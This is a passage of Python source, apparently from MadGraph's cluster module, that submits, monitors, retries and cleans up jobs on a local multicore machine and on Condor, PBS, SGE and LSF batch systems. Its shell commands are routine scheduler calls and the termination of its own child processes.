return id
else:
if isinstance(packet_member, Packet):
self.id_to_packet[id] = packet_member
packet_member.put(id)
if packet_member.tag not in self.packet:
self.packet[packet_member.tag] = packet_member
else:
if packet_member in self.packet:
packet = self.packet[packet_member]
packet.put(id)
self.id_to_packet[id] = packet
return id
def control(self, me_dir=None):
"""Check the status of job associated to directory me_dir. return (idle, run, finish, fail)"""
if not self.submitted_ids:
raise NotImplemented('No implementation of how to control the job status to cluster \'%s\'' % self.name)
idle, run, fail = 0, 0, 0
for pid in self.submitted_ids[:]:
            status = self.control_one_job(pid)
if status == 'I':
idle += 1
elif status == 'R':
run += 1
elif status == 'F':
self.finish +=1
self.submitted_ids.remove(pid)
else:
fail += 1
return idle, run, self.finish, fail
def control_one_job(self, pid):
""" control the status of a single job with it's cluster id """
raise NotImplemented('No implementation of how to control the job status to cluster \'%s\'' % self.name)
def get_jobs_identifier(self, path, second_path=None):
"""get a unique run_name for all the jobs helps to identify the runs
in the controller for some cluster."""
if second_path:
path = os.path.realpath(pjoin(path, second_path))
elif not os.path.exists(path):
return path # job already done
if 'SubProcesses' in path:
target = path.rsplit('/SubProcesses',1)[0]
elif 'MCatNLO' in path:
target = path.rsplit('/MCatNLO',1)[0]
elif 'PY8_parallelization' in path:
target = path.rsplit('/PY8_parallelization',1)[0]
elif second_path:
target=path
logger.warning("cluster.get_job_identifier runs unexpectedly. This should be fine but report this message if you have problem.")
else:
target = path
if target.endswith('/'):
target = target[:-1]
target = misc.digest(target.encode())[-self.identifier_length:]
if not target[0].isalpha():
target = 'a' + target[1:]
return target
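    # Illustrative example (hypothetical path): for
    #   path = '/home/user/PROC_sm_0/SubProcesses/P0_gg_ttx'
    # the identifier is derived from '/home/user/PROC_sm_0' (everything before
    # '/SubProcesses'), hashed with misc.digest() and truncated to its last
    # identifier_length (14) characters; a leading non-letter is replaced by 'a'
    # so that the name is accepted by schedulers such as PBS, SGE or SLURM.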
@check_interupt()
def wait(self, me_dir, fct, minimal_job=0, update_first=None):
"""Wait that all job are finish.
if minimal_job set, then return if idle + run is lower than that number"""
mode = 1 # 0 is long waiting/ 1 is short waiting
nb_iter = 0
nb_short = 0
change_at = 5 # number of iteration from which we wait longer between update.
if update_first:
idle, run, finish, fail = self.control(me_dir)
update_first(idle, run, finish)
        # useful shortcut for readability
longtime, shorttime = self.options['cluster_status_update']
nb_job = 0
if self.options['cluster_type'] == 'htcaas2':
me_dir = self.metasubmit(self)
while 1:
old_mode = mode
nb_iter += 1
idle, run, finish, fail = self.control(me_dir)
if nb_job:
if idle + run + finish + fail != nb_job:
nb_job = idle + run + finish + fail
nb_iter = 1 # since some packet finish prevent to pass in long waiting mode
else:
nb_job = idle + run + finish + fail
if fail:
raise ClusterManagmentError('Some Jobs are in a Hold/... state. Please try to investigate or contact the IT team')
if idle + run == 0:
#time.sleep(20) #security to ensure that the file are really written on the disk
logger.info('All jobs finished')
fct(idle, run, finish)
break
if idle + run < minimal_job:
return
fct(idle, run, finish)
#Determine how much we have to wait (mode=0->long time, mode=1->short time)
if nb_iter < change_at:
mode = 1
elif idle < run:
if old_mode == 0:
if nb_short:
mode = 0 #we already be back from short to long so stay in long
#check if we need to go back to short mode
elif idle:
if nb_iter > change_at + int(longtime)//shorttime:
mode = 0 #stay in long waiting mode
else:
mode = 1 # pass in short waiting mode
nb_short =0
else:
mode = 1 # pass in short waiting mode
nb_short = 0
elif old_mode == 1:
nb_short +=1
if nb_short > 3* max(change_at, int(longtime)//shorttime):
mode = 0 #go back in slow waiting
else:
mode = 0
#if pass from fast(mode=1) to slow(mode=0) make a print statement:
if old_mode > mode:
logger.info('''Start to wait %ss between checking status.
Note that you can change this time in the configuration file.
Press ctrl-C to force the update.''' % self.options['cluster_status_update'][0])
#now Waiting!
if mode == 0:
try:
time.sleep(self.options['cluster_status_update'][0])
except KeyboardInterrupt:
logger.info('start to update the status')
nb_iter = min(0, change_at -2)
nb_short = 0
else:
time.sleep(self.options['cluster_status_update'][1])
self.submitted = 0
self.submitted_ids = []
self.id_to_packet = {}
def check_termination(self, job_id):
"""Check the termination of the jobs with job_id and relaunch it if needed."""
if job_id not in self.retry_args:
if job_id in self.id_to_packet:
nb_in_packet = self.id_to_packet[job_id].remove_one()
if nb_in_packet == 0:
# packet done run the associate function
packet = self.id_to_packet[job_id]
# fully ensure that the packet is finished (thread safe)
packet.queue.join()
#running the function
packet.fct(*packet.args)
del self.id_to_packet[job_id]
return 'resubmit'
else:
return True
args = self.retry_args[job_id]
if 'time_check' in args:
time_check = args['time_check']
else:
time_check = 0
for path in args['required_output']:
if args['cwd']:
path = pjoin(args['cwd'], path)
# check that file exists and is not empty.
if not (os.path.exists(path) and os.stat(path).st_size != 0) :
break
else:
# all requested output are present
if time_check > 0:
logger.info('Job %s Finally found the missing output.' % (job_id))
del self.retry_args[job_id]
self.submitted_ids.remove(job_id)
# check if the job_id is in a packet
if job_id in self.id_to_packet:
nb_in_packet = self.id_to_packet[job_id].remove_one()
if nb_in_packet == 0:
# packet done run the associate function
packet = self.id_to_packet[job_id]
# fully ensure that the packet is finished (thread safe)
packet.queue.join()
#running the function
packet.fct(*packet.args)
del self.id_to_packet[job_id]
return 'resubmit'
return 'done'
if time_check == 0:
logger.debug('''Job %s: missing output:%s''' % (job_id,path))
args['time_check'] = time.time()
return 'wait'
elif self.cluster_retry_wait > time.time() - time_check:
return 'wait'
#jobs failed to be completed even after waiting time!!
if self.nb_retry < 0:
            logger.critical('''Failed to run job %s correctly.
with option: %s
file missing: %s''' % (job_id, args, path))
input('press enter to continue.')
elif self.nb_retry == 0:
            logger.critical('''Failed to run job %s correctly.
with option: %s
file missing: %s.
Stopping all runs.''' % (job_id, args, path))
self.remove()
elif args['nb_submit'] >= self.nb_retry:
            logger.critical('''Failed to run job %s correctly.
with option: %s
file missing: %s
Fails %s times
            No resubmission. ''' % (job_id, args, path, args['nb_submit']))
self.remove()
else:
args['nb_submit'] += 1
            logger.warning('resubmitting job (attempt number %s)' % args['nb_submit'])
del self.retry_args[job_id]
self.submitted_ids.remove(job_id)
if 'time_check' in args:
del args['time_check']
if job_id in self.id_to_packet:
self.id_to_packet[job_id].remove_one()
args['packet_member'] = self.id_to_packet[job_id]
del self.id_to_packet[job_id]
self.cluster_submit(**args)
else:
self.submit2(**args)
return 'resubmit'
return 'done'
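    # Summary of the check_termination() return values implemented above:
    #   'done'     -> all required output files are present; the job is removed
    #                 from the list of submitted ids.
    #   'wait'     -> some required output is still missing; wait up to
    #                 cluster_retry_wait seconds before declaring the job failed.
    #   'resubmit' -> the job was resubmitted with the stored arguments (or the
    #                 packet callback was run for an id that is no longer tracked).
    #   True       -> untracked job id that does not belong to any packet.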
@check_interupt()
def launch_and_wait(self, prog, argument=[], cwd=None, stdout=None,
stderr=None, log=None, required_output=[], nb_submit=0,
input_files=[], output_files=[]):
"""launch one job on the cluster and wait for it"""
        special_output = False # flag to concatenate the error with the output.
        if stderr == -2 and stdout:
            # we are supposed to send the error output to stdout as well
special_output = True
stderr = stdout + '.err'
id = self.submit2(prog, argument, cwd, stdout, stderr, log,
required_output=required_output, input_files=input_files,
output_files=output_files)
if self.options['cluster_type']=='htcaas2':
if self.submitted == self.submitted_ids[-1]:
id = self.metasubmit(self)
frame = inspect.currentframe()
args, _, _, values = inspect.getargvalues(frame)
args = dict([(i, values[i]) for i in args if i != 'self'])
self.retry_args[id] = args
nb_wait=0
while 1:
nb_wait+=1
status = self.control_one_job(id)
if not status in ['R','I']:
status = self.check_termination(id)
if status in ['wait']:
time.sleep(30)
continue
elif status in ['resubmit']:
id = self.submitted_ids[0]
time.sleep(30)
continue
#really stop!
time.sleep(30) #security to ensure that the file are really written on the disk
break
time.sleep(self.options['cluster_status_update'][1])
        if required_output:
            # make sure that the required output is present; this may trigger a
            # resubmission of the job if some files are missing.
            self.check_termination(id)
if special_output:
# combine the stdout and the stderr
#wait up to 50 s to see if those files exists
for i in range(5):
if os.path.exists(stdout):
if not os.path.exists(stderr):
time.sleep(5)
if os.path.exists(stderr):
err_text = open(stderr).read()
if not err_text:
return
logger.warning(err_text)
text = open(stdout).read()
open(stdout,'w').write(text + err_text)
else:
return
time.sleep(10)
def remove(self, *args, **opts):
""" """
logger.warning("""This cluster didn't support job removal,
the jobs are still running on the cluster.""")
@store_input()
def metasubmit(self, me_dir):
logger.warning("""This cluster didn't support metajob submit.""")
return 0
def modify_interface(self, run_interface):
"""routine which allow to modify the run_card/mg5cmd object to change the
default behavior of the runs.
This is called at the time of the compilation of the run_card.
Note that this function can be called multiple times by run.
"""
#run_card = run_interface.run_card
return
class Packet(object):
""" an object for handling packet of job, it is designed to be thread safe
"""
def __init__(self, name, fct, args, opts={}):
import six.moves.queue
import threading
self.queue = six.moves.queue.Queue()
self.tag = name
self.fct = fct
self.args = args
self.opts = opts
self.done = threading.Event()
def put(self, *args, **opts):
self.queue.put(*args, **opts)
append = put
def remove_one(self):
self.queue.get(True)
self.queue.task_done()
return self.queue.qsize()
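# Illustrative sketch (an addition, not part of MadGraph): grouping several
# submissions in a Packet so that a callback runs exactly once when the last job
# of the group finishes. 'combine_results', './ajob1' and the directories passed
# in 'run_dirs' are hypothetical.
def _packet_usage_sketch(cluster, run_dirs):
    def combine_results(me_dir):
        logger.info('all jobs of %s are done' % me_dir)
    packet = Packet('survey_G1', combine_results, ('PROC_dir',))
    for one_dir in run_dirs:
        cluster.cluster_submit('./ajob1', cwd=one_dir, packet_member=packet)
    # once every id of the packet has been flagged as finished,
    # check_termination() (or MultiCore.wait) calls packet.fct(*packet.args).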
class MultiCore(Cluster):
"""class for dealing with the submission in multiple node"""
job_id = "$"
def __init__(self, *args, **opt):
"""Init the cluster """
        super(MultiCore, self).__init__(*args, **opt)
import six.moves.queue
import threading
import six.moves._thread
        self.queue = six.moves.queue.Queue()     # list of jobs to do
        self.done = six.moves.queue.Queue()      # list of finished jobs
        self.submitted = six.moves.queue.Queue() # one entry per submitted job
        self.stoprequest = threading.Event()     # flag to request that everything closes
self.demons = []
self.nb_done =0
if 'nb_core' in opt:
self.nb_core = opt['nb_core']
elif isinstance(args[0],int):
self.nb_core = args[0]
else:
self.nb_core = 1
self.update_fct = None
self.lock = threading.Event() # allow nice lock of the main thread
self.pids = six.moves.queue.Queue() # allow to clean jobs submit via subprocess
        self.done_pid = [] # list of finished jobs
self.done_pid_queue = six.moves.queue.Queue()
self.fail_msg = None
# starting the worker node
for _ in range(self.nb_core):
self.start_demon()
def start_demon(self):
import threading
t = threading.Thread(target=self.worker)
t.daemon = True
t.start()
self.demons.append(t)
def worker(self):
import six.moves.queue
import six.moves._thread
while not self.stoprequest.isSet():
try:
args = self.queue.get()
tag, exe, arg, opt = args
try:
# check for executable case
if isinstance(exe,str):
if os.path.exists(exe) and not exe.startswith('/'):
exe = './' + exe
if isinstance(opt['stdout'],str):
opt['stdout'] = open(opt['stdout'],'w')
if opt['stderr'] == None:
opt['stderr'] = subprocess.STDOUT
if arg:
proc = misc.Popen([exe] + arg, **opt)
else:
proc = misc.Popen(exe, **opt)
pid = proc.pid
self.pids.put(pid)
proc.wait()
if proc.returncode not in [0, 143, -15] and not self.stoprequest.isSet():
fail_msg = 'program %s launch ends with non zero status: %s. Stop all computation' % \
(' '.join([exe]+arg), proc.returncode)
logger.warning(fail_msg)
self.stoprequest.set()
self.remove(fail_msg)
                    # handle the case when this is a python function. Note that
                    # this uses threads, so there is NO built-in parallelization: it
                    # all runs on a single core! (This is fine for I/O-intensive
                    # functions; for CPU-intensive functions this will slow down the computation.)
else:
pid = tag
self.pids.put(pid)
# the function should return 0 if everything is fine
# the error message otherwise
returncode = exe(*arg, **opt)
if returncode != 0:
logger.warning("fct %s does not return 0. Stopping the code in a clean way. The error was:\n%s", exe, returncode)
self.stoprequest.set()
self.remove("fct %s does not return 0:\n %s" % (exe, returncode))
except Exception as error:
self.fail_msg = sys.exc_info()
logger.warning(str(error))
self.stoprequest.set()
self.remove(error)
if __debug__:
six.reraise(self.fail_msg[0], self.fail_msg[1], self.fail_msg[2])
self.queue.task_done()
self.done.put(tag)
self.done_pid_queue.put(pid)
#release the mother to print the status on the screen
try:
self.lock.set()
except six.moves._thread.error:
continue
except six.moves.queue.Empty:
continue
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, required_output=[], nb_submit=0):
"""submit a job on multicore machine"""
tag = (prog, tuple(argument), cwd, nb_submit)
if isinstance(prog, str):
opt = {'cwd': cwd,
'stdout':stdout,
'stderr': stderr}
self.queue.put((tag, prog, argument, opt))
self.submitted.put(1)
return tag
else:
# python function
self.queue.put((tag, prog, argument, {}))
self.submitted.put(1)
return tag
def launch_and_wait(self, prog, argument=[], cwd=None, stdout=None,
stderr=None, log=None, **opts):
"""launch one job and wait for it"""
if isinstance(stdout, str):
stdout = open(stdout, 'w')
if isinstance(stderr, str):
            stderr = open(stderr, 'w')
return misc.call([prog] + argument, stdout=stdout, stderr=stderr, cwd=cwd)
def remove(self, error=None):
"""Ensure that all thread are killed"""
# ensure the worker to stop
self.stoprequest.set()
if error and not self.fail_msg:
self.fail_msg = error
# cleaning the queue done_pid_queue and move them to done_pid
while not self.done_pid_queue.empty():
pid = self.done_pid_queue.get()
self.done_pid.append(pid)
# self.done_pid_queue.task_done()
while not self.pids.empty():
pid = self.pids.get()
self.pids.task_done()
if isinstance(pid, tuple):
continue
if pid in self.done_pid:
continue
out = os.system('CPIDS=$(pgrep -P %(pid)s); kill -15 $CPIDS > /dev/null 2>&1' \
% {'pid':pid} )
out = os.system('kill -15 %(pid)s > /dev/null 2>&1' % {'pid':pid} )
def wait(self, me_dir, update_status, update_first=None):
"""Waiting that all the jobs are done. This function also control that
the submission by packet are handle correctly (i.e. submit the function)"""
import six.moves.queue
import threading
try: # to catch KeyBoardInterupt to see which kind of error to display
last_status = (0, 0, 0)
sleep_time = 1
use_lock = True
first = True
while True:
force_one_more_loop = False # some security
                # Loop over the jobs tagged as done to check whether some packet of
                # jobs is finished; in that case, put the associated function in the queue
while self.done.qsize():
try:
tag = self.done.get(True, 1)
except six.moves.queue.Empty:
pass
else:
if self.id_to_packet and tuple(tag) in self.id_to_packet:
packet = self.id_to_packet[tuple(tag)]
remaining = packet.remove_one()
if remaining == 0:
# fully ensure that the packet is finished (thread safe)
packet.queue.join()
self.submit(packet.fct, packet.args)
force_one_more_loop = True
self.nb_done += 1
self.done.task_done()
                # Get the Idle/Done/Running information from the various queues.
                # Those variables should be thread safe but are only approximate.
Idle = self.queue.qsize()
Done = self.nb_done + self.done.qsize()
Running = max(0, self.submitted.qsize() - Idle - Done)
if Idle + Running <= 0 and not force_one_more_loop:
update_status(Idle, Running, Done)
                    # Going to quit since everything is done.
                    # Fully ensure that everything is indeed done.
self.queue.join()
break
if (Idle, Running, Done) != last_status:
if first and update_first:
update_first(Idle, Running, Done)
first = False
else:
update_status(Idle, Running, Done)
last_status = (Idle, Running, Done)
# cleaning the queue done_pid_queue and move them to done_pid
while not self.done_pid_queue.empty():
pid = self.done_pid_queue.get()
self.done_pid.append(pid)
self.done_pid_queue.task_done()
# Define how to wait for the next iteration
if use_lock:
# simply wait that a worker release the lock
use_lock = self.lock.wait(300)
self.lock.clear()
if not use_lock and Idle > 0:
use_lock = True
else:
                    # to be sure that we never fully lock at the end, fall back to
                    # a simple time.sleep()
time.sleep(sleep_time)
sleep_time = min(sleep_time + 2, 180)
if update_first:
update_first(Idle, Running, Done)
if self.stoprequest.isSet():
if isinstance(self.fail_msg, Exception):
raise self.fail_msg
elif isinstance(self.fail_msg, str):
raise Exception(self.fail_msg)
else:
misc.sprint(self.fail_msg)
six.reraise(self.fail_msg[0], self.fail_msg[1], self.fail_msg[2])
# reset variable for next submission
try:
self.lock.clear()
except Exception:
pass
self.done = six.moves.queue.Queue()
self.done_pid = []
self.done_pid_queue = six.moves.queue.Queue()
self.nb_done = 0
self.submitted = six.moves.queue.Queue()
self.pids = six.moves.queue.Queue()
self.stoprequest.clear()
self.id_to_packet = {}
except KeyboardInterrupt:
            # if one of the nodes fails -> return that error
if isinstance(self.fail_msg, Exception):
raise self.fail_msg
elif isinstance(self.fail_msg, str):
raise Exception(self.fail_msg)
elif self.fail_msg:
six.reraise(self.fail_msg[0], self.fail_msg[1], self.fail_msg[2])
            # else return the original error
raise
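# Illustrative sketch (an addition, not part of MadGraph): local running with the
# MultiCore class defined above. './ajob1', the log names and the 'combine'
# callable are hypothetical; Python callables are executed in a thread of the
# same process, so they should stay I/O bound.
def _multicore_usage_sketch():
    cluster = MultiCore(nb_core=4)
    for i in range(8):
        cluster.submit('./ajob1', argument=[str(i)], cwd='SubProcesses',
                       stdout='log_%i.txt' % i)
    def combine(tag):
        return 0                      # a return value of 0 means success
    cluster.submit(combine, argument=['all'])
    status = lambda idle, run, done: logger.info('%s idle, %s running, %s done'
                                                 % (idle, run, done))
    cluster.wait('.', status)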
class CondorCluster(Cluster):
"""Basic class for dealing with cluster submission"""
name = 'condor'
job_id = 'CONDOR_ID'
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to a Condor cluster"""
text = """Executable = %(prog)s
output = %(stdout)s
error = %(stderr)s
log = %(log)s
%(argument)s
environment = CONDOR_ID=$(Cluster).$(Process)
Universe = vanilla
notification = Error
Initialdir = %(cwd)s
%(requirement)s
getenv=True
queue 1
"""
if self.cluster_queue not in ['None', None]:
requirement = 'Requirements = %s=?=True' % self.cluster_queue
else:
requirement = ''
if cwd is None:
cwd = os.getcwd()
if stdout is None:
stdout = '/dev/null'
if stderr is None:
stderr = '/dev/null'
if log is None:
log = '/dev/null'
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if argument:
argument = 'Arguments = %s' % ' '.join(argument)
else:
argument = ''
dico = {'prog': prog, 'cwd': cwd, 'stdout': stdout,
'stderr': stderr,'log': log,'argument': argument,
'requirement': requirement}
#open('submit_condor','w').write(text % dico)
a = misc.Popen(['condor_submit'], stdout=subprocess.PIPE,
stdin=subprocess.PIPE)
output, _ = a.communicate((text % dico).encode())
#output = a.stdout.read()
#Submitting job(s).
#Logging submit event(s).
#1 job(s) submitted to cluster 2253622.
pat = re.compile("submitted to cluster (\d*)",re.MULTILINE)
output = output.decode(errors='ignore')
try:
id = pat.search(output).groups()[0]
except:
raise ClusterManagmentError('fail to submit to the cluster: \n%s' \
% output)
self.submitted += 1
self.submitted_ids.append(id)
return id
@store_input()
@multiple_try()
def submit2(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0):
"""Submit the job on the cluster NO SHARE DISK
           input/output files should be given relative to cwd
"""
if not required_output and output_files:
required_output = output_files
if (input_files == [] == output_files):
return self.submit(prog, argument, cwd, stdout, stderr, log,
required_output=required_output, nb_submit=nb_submit)
text = """Executable = %(prog)s
output = %(stdout)s
error = %(stderr)s
log = %(log)s
%(argument)s
should_transfer_files = YES
when_to_transfer_output = ON_EXIT
transfer_input_files = %(input_files)s
%(output_files)s
Universe = vanilla
notification = Error
Initialdir = %(cwd)s
%(requirement)s
getenv=True
queue 1
"""
if self.cluster_queue not in ['None', None]:
requirement = 'Requirements = %s=?=True' % self.cluster_queue
else:
requirement = ''
if cwd is None:
cwd = os.getcwd()
if stdout is None:
stdout = '/dev/null'
if stderr is None:
stderr = '/dev/null'
if log is None:
log = '/dev/null'
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if argument:
argument = 'Arguments = %s' % ' '.join([str(a) for a in argument])
else:
argument = ''
# input/output file treatment
if input_files:
input_files = ','.join(input_files)
else:
input_files = ''
if output_files:
output_files = 'transfer_output_files = %s' % ','.join(output_files)
else:
output_files = ''
dico = {'prog': prog, 'cwd': cwd, 'stdout': stdout,
'stderr': stderr,'log': log,'argument': argument,
'requirement': requirement, 'input_files':input_files,
'output_files':output_files}
#open('submit_condor','w').write(text % dico)
a = subprocess.Popen(['condor_submit'], stdout=subprocess.PIPE,
stdin=subprocess.PIPE)
output, _ = a.communicate((text % dico).encode())
#output = a.stdout.read()
#Submitting job(s).
#Logging submit event(s).
#1 job(s) submitted to cluster 2253622.
output = output.decode(errors='ignore')
pat = re.compile("submitted to cluster (\d*)",re.MULTILINE)
try:
id = pat.search(output).groups()[0]
except:
raise ClusterManagmentError('fail to submit to the cluster: \n%s' \
% output)
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try(nb_try=10, sleep=10)
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
cmd = 'condor_q '+str(id)+" -format \'%-2s \\n\' \'ifThenElse(JobStatus==0,\"U\",ifThenElse(JobStatus==1,\"I\",ifThenElse(JobStatus==2,\"R\",ifThenElse(JobStatus==3,\"X\",ifThenElse(JobStatus==4,\"C\",ifThenElse(JobStatus==5,\"H\",ifThenElse(JobStatus==6,\"E\",string(JobStatus))))))))\'"
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
error = status.stderr.read().decode(errors='ignore')
if status.returncode or error:
raise ClusterManagmentError('condor_q returns error: %s' % error)
return status.stdout.readline().decode(errors='ignore').strip()
jobstatus = {'0':'U', '1':'I','2':'R','3':'X','4':'C','5':'H','6':'E'}
@check_interupt()
@multiple_try(nb_try=10, sleep=10)
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
if not self.submitted_ids:
return 0, 0, 0, 0
packet = 15000
idle, run, fail = 0, 0, 0
ongoing = []
for i in range(1+(len(self.submitted_ids)-1)//packet):
start = i * packet
stop = (i+1) * packet
cmd = "condor_q " + ' '.join(self.submitted_ids[start:stop]) + \
" -format \"%d \" ClusterId " + \
" -format \"%d\\n\" JobStatus "
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
error = status.stderr.read().decode(errors='ignore')
if status.returncode or error:
raise ClusterManagmentError('condor_q returns error: %s' % error)
for line in status.stdout:
id, status = line.decode(errors='ignore').strip().split()
status = self.jobstatus[status]
ongoing.append(id)
if status in ['I','U']:
idle += 1
elif status == 'R':
run += 1
elif status != 'C':
fail += 1
for id in list(self.submitted_ids):
if id not in ongoing:
status = self.check_termination(id)
if status == 'wait':
run += 1
elif status == 'resubmit':
idle += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobson the cluster"""
if not self.submitted_ids:
return
cmd = "condor_rm %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class PBSCluster(Cluster):
"""Basic class for dealing with cluster submission"""
name = 'pbs'
job_id = 'PBS_JOBID'
idle_tag = ['Q']
running_tag = ['T','E','R']
complete_tag = ['C']
maximum_submited_jobs = 2500
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to a PBS cluster"""
me_dir = self.get_jobs_identifier(cwd, prog)
if len(self.submitted_ids) > self.maximum_submited_jobs:
fct = lambda idle, run, finish: logger.info('Waiting for free slot: %s %s %s' % (idle, run, finish))
self.wait(me_dir, fct, self.maximum_submited_jobs)
text = ""
if cwd is None:
cwd = os.getcwd()
else:
text = " cd %s;" % cwd
if stdout is None:
stdout = '/dev/null'
if stderr is None:
stderr = '/dev/null'
elif stderr == -2: # -2 is subprocess.STDOUT
stderr = stdout
if log is None:
log = '/dev/null'
if not os.path.isabs(prog):
text += "./%s" % prog
else:
text+= prog
if argument:
text += ' ' + ' '.join(argument)
command = ['qsub','-o', stdout,
'-N', me_dir,
'-e', stderr,
'-V']
if self.cluster_queue and self.cluster_queue != 'None':
command.extend(['-q', self.cluster_queue])
a = misc.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate(text.encode())[0].decode(errors='ignore')
id = output.split('.')[0]
if not id.isdigit() or a.returncode !=0:
raise ClusterManagmentError('fail to submit to the cluster: \n%s' \
% output)
self.submitted += 1
self.submitted_ids.append(id)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
cmd = 'qstat '+str(id)
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
for line in status.stdout:
line = line.decode(errors='ignore').strip()
if 'cannot connect to server' in line or 'cannot read reply' in line:
raise ClusterManagmentError('server disconnected')
if 'Unknown' in line:
return 'F'
elif line.startswith(str(id)):
jobstatus = line.split()[4]
else:
jobstatus=""
if status.returncode != 0 and status.returncode is not None:
raise ClusterManagmentError('server fails in someway (errorcode %s)' % status.returncode)
if jobstatus in self.idle_tag:
return 'I'
elif jobstatus in self.running_tag:
return 'R'
return 'F'
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
cmd = "qstat"
status = misc.Popen([cmd], stdout=subprocess.PIPE)
me_dir = self.get_jobs_identifier(me_dir)
ongoing = []
idle, run, fail = 0, 0, 0
for line in status.stdout:
line = line.decode(errors='ignore')
if 'cannot connect to server' in line or 'cannot read reply' in line:
raise ClusterManagmentError('server disconnected')
if me_dir in line:
ongoing.append(line.split()[0].split('.')[0])
status2 = line.split()[4]
if status2 in self.idle_tag:
idle += 1
elif status2 in self.running_tag:
run += 1
elif status2 in self.complete_tag:
if not self.check_termination(line.split()[0].split('.')[0]):
idle += 1
else:
fail += 1
if status.returncode != 0 and status.returncode is not None:
raise ClusterManagmentError('server fails in someway (errorcode %s)' % status.returncode)
for id in list(self.submitted_ids):
if id not in ongoing:
status2 = self.check_termination(id)
if status2 == 'wait':
run += 1
elif status2 == 'resubmit':
idle += 1
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "qdel %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class SGECluster(Cluster):
"""Basic class for dealing with cluster submission"""
# Class written by Arian Abrahantes.
name = 'sge'
job_id = 'JOB_ID'
idle_tag = ['qw', 'hqw','hRqw','w']
running_tag = ['r','t','Rr','Rt']
identifier_length = 10
def def_get_path(self,location):
"""replace string for path issues"""
location = os.path.realpath(location)
homePath = os.getenv("HOME")
if homePath:
location = location.replace(homePath,'$HOME')
return location
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to an SGE cluster"""
me_dir = self.get_jobs_identifier(cwd, prog)
if cwd is None:
#cwd = os.getcwd()
cwd = self.def_get_path(os.getcwd())
cwd1 = self.def_get_path(cwd)
text = " cd %s;" % cwd1
if stdout is None:
stdout = '/dev/null'
else:
stdout = self.def_get_path(stdout)
if stderr is None:
stderr = '/dev/null'
elif stderr == -2: # -2 is subprocess.STDOUT
stderr = stdout
else:
stderr = self.def_get_path(stderr)
if log is None:
log = '/dev/null'
else:
log = self.def_get_path(log)
text += prog
if argument:
text += ' ' + ' '.join(argument)
#if anything slips through argument
#print "!=== inteded change ",text.replace('/srv/nfs','')
#text = text.replace('/srv/nfs','')
homePath = os.getenv("HOME")
if homePath:
text = text.replace(homePath,'$HOME')
logger.debug("!=== input %s" % text)
logger.debug("!=== output %s" % stdout)
logger.debug("!=== error %s" % stderr)
logger.debug("!=== logs %s" % log)
command = ['qsub','-o', stdout,
'-N', me_dir,
'-e', stderr,
'-V']
if self.cluster_queue and self.cluster_queue != 'None':
command.extend(['-q', self.cluster_queue])
a = misc.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE, cwd=cwd)
output = a.communicate(text.encode())[0].decode(errors='ignore')
id = output.split(' ')[2]
if not id.isdigit():
raise ClusterManagmentError('fail to submit to the cluster: \n%s' \
% output)
self.submitted += 1
self.submitted_ids.append(id)
logger.debug(output)
return id
@multiple_try()
def control_one_job(self, id):
""" control the status of a single job with it's cluster id """
#cmd = 'qstat '+str(id)
cmd = 'qstat '
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
for line in status.stdout:
line = line.decode(errors='ignore')
#print "!==",line
#line = line.strip()
#if 'Unknown' in line:
# return 'F'
#elif line.startswith(str(id)):
# status = line.split()[4]
if str(id) in line:
status = line.split()[4]
#print "!=status", status
if status in self.idle_tag:
return 'I'
elif status in self.running_tag:
return 'R'
return 'F'
@multiple_try()
def control(self, me_dir):
""" control the status of a single job with it's cluster id """
cmd = "qstat "
status = misc.Popen([cmd], shell=True, stdout=subprocess.PIPE)
me_dir = self.get_jobs_identifier(me_dir)
finished = list(self.submitted_ids)
idle, run, fail = 0, 0, 0
for line in status.stdout:
line = line.decode(errors='ignore')
if me_dir in line:
id,_,_,_,status = line.split()[:5]
if status in self.idle_tag:
idle += 1
finished.remove(id)
elif status in self.running_tag:
run += 1
finished.remove(id)
else:
logger.debug(line)
fail += 1
finished.remove(id)
for id in finished:
self.check_termination(id)
return idle, run, self.submitted - (idle+run+fail), fail
@multiple_try()
def remove(self, *args, **opts):
"""Clean the jobs on the cluster"""
if not self.submitted_ids:
return
cmd = "qdel %s" % ' '.join(self.submitted_ids)
status = misc.Popen([cmd], shell=True, stdout=open(os.devnull,'w'))
self.submitted_ids = []
class LSFCluster(Cluster):
"""Basic class for dealing with cluster submission"""
name = 'lsf'
job_id = 'LSB_JOBID'
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit the job prog to an LSF cluster"""
me_dir = self.get_jobs_identifier(cwd, prog)
text = ""
command = ['bsub', '-C0', '-J', me_dir]
if cwd is None:
cwd = os.getcwd()
else:
